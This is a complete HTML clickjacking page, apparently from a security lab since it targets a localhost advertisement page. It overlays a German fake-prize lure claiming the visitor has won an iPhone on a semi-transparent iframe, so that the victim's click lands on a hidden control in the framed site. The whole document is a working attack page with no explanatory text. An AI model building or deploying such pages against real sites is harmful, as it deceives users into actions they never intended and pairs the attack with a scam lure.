<html>
    <style>
        .iframecover {
            position: absolute;
            top: 0;
            left: 70px;
            width: 500px;
            height: 350px;
        }
        .delete {
            position: absolute;
            top: 70px;
            left: 160px;
            width: 80px;
            z-index: -1;
        }
        .invisible {
            opacity: 0.3;
        }
    </style>
<body>
    <input class="delete" type="button" value="HIER"/>
    <div class="iframecover">
        <h1>Sie haben ein iPhone gewonnen!</h1>
        <p>Klicken Sie </p>
        <p>um den Gewinn einzul&ouml;sen. Denn als 143256. Besucher unserer Seite sind <em>SIE</em> auserw&auml;hlt!</p>
    </div>
    <iframe class="invisible" scrolling="no" width="500px" height="350px" src="http://localhost:8080/ad/1"></iframe>
</body>
</html>